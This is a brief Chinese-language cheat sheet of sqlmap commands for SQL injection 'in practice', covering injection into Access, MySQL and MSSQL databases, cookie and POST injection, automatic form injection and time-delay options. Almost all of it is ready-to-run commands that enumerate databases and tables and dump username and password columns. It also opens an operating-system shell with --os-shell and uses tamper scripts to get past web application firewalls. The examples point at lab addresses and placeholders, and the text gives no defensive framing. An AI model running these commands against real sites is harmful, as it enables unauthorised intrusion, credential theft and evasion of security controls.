说明
本文主要讲一下sqlmap在实战中的一些技巧
注入检测
检测注入
sqlmap.py -u http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 --batch
参数“–batch”命令来自动答复y或n。
批量检测
sqlmap.py-m url.txt
常用注入方法
1.ACCESS数据库注入:
sqlmap.py -u “url”
sqlmap.py -u “url” –tables
sqlmap.py -u “url” –columns -T “要拆的表名”
sqlmap.py -u “url” –dump -T “要拆的表名”-C “要拆的字段名”
2.MYSQL数据库注入:
sqlmap.py -u “url”
sqlmap.py -u “url” –dbs
sqlmap.py -u “url” –current-db
sqlmap.py -u “url” –current-user
sqlmap.py -u “url” –tables -D “当前数据库名”
sqlmap.py -u “url” –columns -T “要拆得的表名” -D “当前数据库名”
sqlmap.py -u “url” –dump -C “字段名” -T “表名” -D “当前数据库”
3.mssql数据库:
同MYSQL
4.COOKIE注入:
sqlmap.py -u “www.xxx.com/asp或者www.xxx.com/php”?–cookie “参数名如id=1” –level 2
5.POST注入:
抓包保存到SQLMAP目录下.txt的文件然后输入指令sqlmap.py -r xxx.txt
sqlmap.py -u “url” –os-shell
7.注入HTTP请求 :
sqlmap.py -r xxx.txt –dbs
8.绕过WAF的tamper插件使用:
sqlmap.py -u “url” –tamper “xxx.py”
9.sqlmap自动填写表单注入:
sqlmap.py -u URL –forms
sqlmap.py -u URL –forms –dbs
sqlmap.py -u URL –forms –current-db
sqlmap.py -u URL –forms -D 数据库名称–tables
sqlmap.py -u URL –forms -D 数据库名称 -T 表名 –columns
sqlmap.py -u URL –forms -D 数据库名称 -T 表名 -Cusername,password –dump
10.延时注入:
sqlmap –dbs -u “url” –delay 0.5
sqlmap –dbs -u “url” –safe-freq
实战使用
列出全部数据库
sqlmap -u ” http://127.0.0.1/web.php?id=1 ” --dbs
列出 web1库的全部表
sqlmap -u ” http://127.0.0.1/web.php?id=1 ” -D web1 --tables
列出user表全部字段
sqlmap -u ” http://127.0.0.1/web.php?id=1 ” -D web1 -T user --columns
跑指定字段的数据
sqlmap -u ” http://127.0.0.1/web.php?id=1 ” -D web1 -T user -C ‘name,username,passwd’ --dump